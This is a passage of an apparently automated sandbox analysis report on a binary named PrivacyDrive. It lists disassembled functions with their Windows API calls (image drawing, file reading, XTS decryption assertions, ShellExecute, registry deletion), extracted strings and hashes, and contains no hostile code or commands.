                                  • Part of subcall function 00420760: GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,7563D392), ref: 004207B8
                                • GlobalUnlock.KERNEL32(00000000), ref: 00420513
                                • GlobalFree.KERNEL32(00000000), ref: 0042051A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Global$AllocImage$CreateFromStream$BitmapFreeHeightLoadLockScan0UnlockWidth_memmove
                                • String ID:
                                • API String ID: 4275973583-0
                                • Opcode ID: df9a8e73d0d2d87e9b2bc4ecfa5719eec9267313256c40909baa2f8efe438889
                                • Instruction ID: 2f1dcf6bd82019c055be1a15501efeb8104742cb9a65ed52b3ae44e9ef144ca2
                                • Opcode Fuzzy Hash: df9a8e73d0d2d87e9b2bc4ecfa5719eec9267313256c40909baa2f8efe438889
                                • Instruction Fuzzy Hash: 7351C170B00216AFCB14EF66D854A7FB7F5AF49710F44812EE905AB352DB38AD40CBA5
                                Function 004C50A0 Relevance: 10.7, APIs: 7, Instructions: 171memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000000,?,?,00000000,?,7563D392,?,00000000), ref: 004C5118
                                • GlobalLock.KERNEL32(00000000), ref: 004C5129
                                • _memmove.LIBCMT ref: 004C513D
                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?,00000000), ref: 004C514B
                                  • Part of subcall function 004207F0: GdipAlloc.GDIPLUS(00000010,7563D392,00000000,?,00000000,00000000,0053C6F8,000000FF,?,00420403), ref: 00420819
                                  • Part of subcall function 004207F0: GdipLoadImageFromStream.GDIPLUS(00000000,00000004), ref: 00420840
                                • GdipAlloc.GDIPLUS(00000010,?,00000000), ref: 004C5183
                                  • Part of subcall function 00408CC0: GdipGetImageHeight.GDIPLUS(?,00000000,00000000,00000000,?,00420435), ref: 00408CD5
                                  • Part of subcall function 00408C90: GdipGetImageWidth.GDIPLUS(?,00000000,00000000,00000000,?,0042043D,00000000), ref: 00408CA5
                                  • Part of subcall function 00420760: GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,7563D392), ref: 004207B8
                                • GlobalUnlock.KERNEL32(00000000), ref: 004C5273
                                • GlobalFree.KERNEL32(00000000), ref: 004C527A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Global$AllocImage$CreateFromStream$BitmapFreeHeightLoadLockScan0UnlockWidth_memmove
                                • String ID:
                                • API String ID: 4275973583-0
                                • Opcode ID: 1e2e060ec0da00ee9f387aa5d731a758271d09dbe4a9b31f959fd7921f91698c
                                • Instruction ID: 9dc68ff19be282a25164d7e04648bc6ea08636f13c523602c7a605cb811b94a2
                                • Opcode Fuzzy Hash: 1e2e060ec0da00ee9f387aa5d731a758271d09dbe4a9b31f959fd7921f91698c
                                • Instruction Fuzzy Hash: 8751E335B006199BDB10DFA6C895BBFB7F8AF88710F44412EF905A7381DB38A9448BD4
                                Function 0052B720 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 162COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0052CF10: _fprintf.LIBCMT ref: 0052CF2A
                                  • Part of subcall function 0052CF10: _raise.LIBCMT ref: 0052CF31
                                • _memmove.LIBCMT ref: 0052B8B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _fprintf_memmove_raise
                                • String ID: ct != NULL$pt != NULL$src\modes\xts\xts_decrypt.c$tweak != NULL$xts != NULL
                                • API String ID: 2200152502-2998850538
                                • Opcode ID: 69af57d825b34a94be16c29eabe8db33a23319598dd3570cadf2c9d73b110b87
                                • Instruction ID: 8280513a5b441771b58343394fae671bbf64bbb92aa6da1e3e6c352855151830
                                • Opcode Fuzzy Hash: 69af57d825b34a94be16c29eabe8db33a23319598dd3570cadf2c9d73b110b87
                                • Instruction Fuzzy Hash: 8B51C672D0022E6BEF15DE64ED81AEE7F68FF55304F140525FD08A7282E731AA04C791
                                Function 004B9830 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileSizeEx.KERNEL32(?,?), ref: 004B98C2
                                  • Part of subcall function 0041D940: OutputDebugStringW.KERNEL32(?,?,?), ref: 0041D9B6
                                  • Part of subcall function 0043A4E0: _memset.LIBCMT ref: 0043A542
                                • ReadFile.KERNEL32(?,?,01000000,?,00000000,01000000), ref: 004B991C
                                • ReadFile.KERNEL32(?,?,01000000,?), ref: 004B997C
                                • GetLastError.KERNEL32 ref: 004B998A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: File$Read$DebugErrorLastOutputSizeString_memset
                                • String ID: FS = %I64u$md5
                                • API String ID: 349419775-909482460
                                • Opcode ID: dadd656dec2e0e05b8d618c9de2e422a0ca132c917cc803ae8a8d549baf79423
                                • Instruction ID: dfa75fa1de064dbe609fc4d66b00eb58ddb15790f5bef23362b76317e440eba1
                                • Opcode Fuzzy Hash: dadd656dec2e0e05b8d618c9de2e422a0ca132c917cc803ae8a8d549baf79423
                                • Instruction Fuzzy Hash: 43516BB16083009FD350CF19CC85B9BBBE8BF99354F000A2EF599873A0E775A944CB56
                                Function 00421370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 0042140F
                                • _memmove.LIBCMT ref: 00421444
                                • _memmove.LIBCMT ref: 0042147B
                                • _memmove.LIBCMT ref: 004214A3
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004214DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                • String ID: deque<T> too long
                                • API String ID: 279611364-309773918
                                • Opcode ID: 332fe45bce1ebe25c49b9b6f0ec54a729c6560aaac7db5a74f0828855bb12c40
                                • Instruction ID: 0f62a651c2f72f77b9636ea5b42dad542b9fc3f9c1ccc4485bceb6f92b63de64
                                • Opcode Fuzzy Hash: 332fe45bce1ebe25c49b9b6f0ec54a729c6560aaac7db5a74f0828855bb12c40
                                • Instruction Fuzzy Hash: F941F371B001199BDB10DF98D880BAEB7BAAF94300F58862AD809D7355E774EE01CBE1
                                Function 004F14C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 004F155F
                                • _memmove.LIBCMT ref: 004F1594
                                • _memmove.LIBCMT ref: 004F15CB
                                • _memmove.LIBCMT ref: 004F15F3
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004F162D
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                • String ID: deque<T> too long
                                • API String ID: 279611364-309773918
                                • Opcode ID: 315e743d62de5e459ba6462f3202ae247cd7311b9eda939698d7d40590ba9eec
                                • Instruction ID: e137e9589e79232e9cf7c83c537a5ec3cf7130c1938c08cc892274d1298360be
                                • Opcode Fuzzy Hash: 315e743d62de5e459ba6462f3202ae247cd7311b9eda939698d7d40590ba9eec
                                • Instruction Fuzzy Hash: 7E41E371A00109EBDB10CF98C884BAEB77AFF84304F18862AD905D7255E775EE01CBE1
                                Function 004B0850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B08D1
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B09AF
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B09D3
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B09EB
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0A0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID: [
                                • API String ID: 2222842502-2256786511
                                • Opcode ID: 2dd433a4466e8190e80c83dd1c8407de89c944d3811e56fd4639bc1149d10577
                                • Instruction ID: 32ef22c330c28f9c1a7aa09e0cbfab8f1505213d9d01966a38f542d01d71fa64
                                • Opcode Fuzzy Hash: 2dd433a4466e8190e80c83dd1c8407de89c944d3811e56fd4639bc1149d10577
                                • Instruction Fuzzy Hash: AC517D34A503049FE714DF68DC9AFD6B3A8BB08714F14467AEA15AB2D1CBB4B804CF65
                                Function 0042E370 Relevance: 10.6, APIs: 7, Instructions: 123COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0042E39D
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042E3B9
                                • GdipCreateStringFormat.GDIPLUS(00000000), ref: 0042E418
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E459
                                • ReleaseDC.USER32(00000000,00000000), ref: 0042E4BF
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0042E4CC
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0042E4DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsMeasureRelease
                                • String ID:
                                • API String ID: 2860005999-0
                                • Opcode ID: b8e99930b762ee35ec31d3eda8c2006f2a8ddef138ba6d27961e2d28fa441354
                                • Instruction ID: a1a35c500f5c863af352f852cd16a8bfb1f9d2364145a45e03f7e97dd071d77a
                                • Opcode Fuzzy Hash: b8e99930b762ee35ec31d3eda8c2006f2a8ddef138ba6d27961e2d28fa441354
                                • Instruction Fuzzy Hash: 57515671A00308EFDB15CFA9DC54BEEBBB4FB19315F10821AE915A7290E7756948CF60
                                Function 004B0A30 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 004B0ACD
                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 004B0B9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell_memmove
                                • String ID: Hyperlink$ONLINE_HELP$Tasks.cpp$Version.xml
                                • API String ID: 963651277-4098510394
                                • Opcode ID: 0884fbb45de3e256870125da6faba786bfb2b3fcea749478bd3731b0a8574d4f
                                • Instruction ID: 82758cd91716046957feb2613f2f60d9e2b28db297af476576b0a681b9dbcf37
                                • Opcode Fuzzy Hash: 0884fbb45de3e256870125da6faba786bfb2b3fcea749478bd3731b0a8574d4f
                                • Instruction Fuzzy Hash: A4418F71108341AFE310DF51C846B9BBBE8FB94758F000A2DF585962D1EBB8E508CBA7
                                Function 004C44F0 Relevance: 10.6, APIs: 7, Instructions: 118registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 004C450C
                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 004C4526
                                • lstrlenW.KERNEL32(?), ref: 004C455F
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,?), ref: 004C45AD
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,?,?,?), ref: 004C4601
                                • RegCloseKey.ADVAPI32(?), ref: 004C4617
                                • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 004C461F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DeleteEnum$CloseOpenlstrlen
                                • String ID:
                                • API String ID: 242527159-0
                                • Opcode ID: 7417a38eecbe98fe67114ba03710a45c9d9d61469adfb44cd8c06802587ace82
                                • Instruction ID: 5ba99d398154806853dd991caee1d39484c6cc6b7a438dd55f6cbec05c54d8f4
                                • Opcode Fuzzy Hash: 7417a38eecbe98fe67114ba03710a45c9d9d61469adfb44cd8c06802587ace82
                                • Instruction Fuzzy Hash: 3631A33174021CABDB209B65DC99FEBB3BCEF94711F0000AEFA09D2190DA749D44DBA4
                                Function 0041C840 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 117sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040E530: _memmove.LIBCMT ref: 0040E5A4
                                • _memset.LIBCMT ref: 0041C8E0
                                • ShellExecuteExW.SHELL32(0000003C), ref: 0041C9AC
                                • Sleep.KERNEL32(00000064), ref: 0041C9C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShellSleep_memmove_memset
                                • String ID: !@$/FormatDialog %u %d$<
                                • API String ID: 2977420029-3687950762
                                • Opcode ID: 98c7388262d54147b5cd20b60f634ae92d02d9b8b92a96a7f252d162ccbb6487
                                • Instruction ID: 6ab44b0f287efee857454f046b5324c017087149d1c745bc6a9b9ddb34b63ada
                                • Opcode Fuzzy Hash: 98c7388262d54147b5cd20b60f634ae92d02d9b8b92a96a7f252d162ccbb6487
                                • Instruction Fuzzy Hash: FB5109B15183809FD320CF65C849B8BBBE4BF85718F104A1DF198862A0DBB99448CF97
                                Function 004A9B40 Relevance: 10.6, APIs: 7, Instructions: 117COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 004A9B8B
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 004A9BA9
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 004A9C1A
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004A9C66
                                • ReleaseDC.USER32(00000000,00000000), ref: 004A9C78
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 004A9C99
                                • GdipDeleteGraphics.GDIPLUS(?), ref: 004A9CA8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsMeasureRelease
                                • String ID:
                                • API String ID: 2860005999-0
                                • Opcode ID: 8969f980e096e40a97389ad7d65aa7a47887f323a7ccc1eccfcb5e617cc66a3d
                                • Instruction ID: 01edee387bd62305a43ce7bf6ea8ff25af4d2fe53371fa110ab4a18a9486803e
                                • Opcode Fuzzy Hash: 8969f980e096e40a97389ad7d65aa7a47887f323a7ccc1eccfcb5e617cc66a3d
                                • Instruction Fuzzy Hash: 134169B25083409FD310CF15D958B6BFBE4FB9A725F004A1EF98597290E7B5A848CB92
                                Function 004CB2C0 Relevance: 10.6, APIs: 7, Instructions: 113memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GdipAlloc.GDIPLUS(00000010,7563D392,?,?,00000001,?,?,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB309
                                  • Part of subcall function 00420760: GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,7563D392), ref: 004207B8
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB358
                                • GdipGraphicsClear.GDIPLUS(00000000,00000000,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB36B
                                • GdipGetDpiX.GDIPLUS(00000000,?,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB380
                                • GdipGetDpiY.GDIPLUS(?,?,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB395
                                • CreateCompatibleDC.GDI32(00000000), ref: 004CB3CB
                                • SelectObject.GDI32(00000000,?), ref: 004CB3DC
                                Memory Dump Source
